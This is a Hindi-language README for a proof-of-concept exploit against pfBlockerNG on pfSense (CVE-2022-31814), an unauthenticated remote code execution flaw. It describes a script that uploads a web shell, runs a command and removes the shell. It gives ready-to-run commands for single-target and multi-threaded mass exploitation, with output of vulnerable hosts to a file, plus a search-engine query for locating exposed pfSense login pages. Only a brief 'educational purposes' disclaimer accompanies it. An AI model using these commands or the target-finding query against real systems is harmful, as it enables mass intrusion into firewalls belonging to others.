
pfBlockerNG <= 2.1.4_26 बिना प्रमाणीकरण RCE (CVE-2022-31814)
यह स्क्रिप्ट pfBlockerNG <= 2.1.4_26 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है जो रिमोट कोड निष्पादन (remote code execution) की अनुमति देता है। यह एकल लक्ष्य URL या URL की सूची लेता है, एक शेल अपलोड करता है, एक कमांड निष्पादित करता है, और फिर शेल को हटा देता है।
इस स्क्रिप्ट के लिए Python 3.x तथा requests और concurrent.futures मॉड्यूल स्थापित होना आवश्यक है। आप इन मॉड्यूल्स को निम्न कमांड चलाकर स्थापित कर सकते हैं:
pip3 install requests concurrent.futures
या
pip3 install -r requirements.txt
usage: exploit.py [-h] [-c COMMAND] [-l LIST] [-i IP] [-t THREADS] [-o OUTPUT]
pfBlockerNG <= 2.1.4_26 Unauth RCE
options:
-h, --help show this help message and exit
-c COMMAND, --command COMMAND
Console Command ('id')
-l LIST, --list LIST List of targets (list.txt)
-i IP, --ip IP Base target uri (ex. http://target-uri/)
-t THREADS, --threads THREADS
Number of threads for mass scan
-o OUTPUT, --output OUTPUT
Output file (vuln.txt)
एकल लक्ष्य का शोषण करने के लिए, -i या --ip फ़्लैग का उपयोग करें और आधार URL या IP पता निर्दिष्ट करें:
python3 exploit.py -i http://target-uri/ -c 'id'
लक्ष्यों की सूची को स्कैन करने के लिए, -l या --list फ़्लैग का उपयोग करें और सूची का पथ निर्दिष्ट करें:
python3 exploit.py -l list.txt -c 'id' -t 50
स्कैन के लिए उपयोग किए जाने वाले थ्रेड्स की संख्या निर्दिष्ट करने हेतु -t या --threads फ़्लैग का उपयोग किया जा सकता है।
यदि -o या --output फ़्लैग निर्दिष्ट किया गया है, तो असुरक्षित लक्ष्यों की सूची एक फ़ाइल में लिख दी जाएगी:
python3 exploit.py -l list.txt -c 'id' -o vuln.txt
http.title:"pfSense - Login" "Server: nginx" "Set-Cookie: PHPSESSID="
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। अपने जोखिम पर उपयोग करें।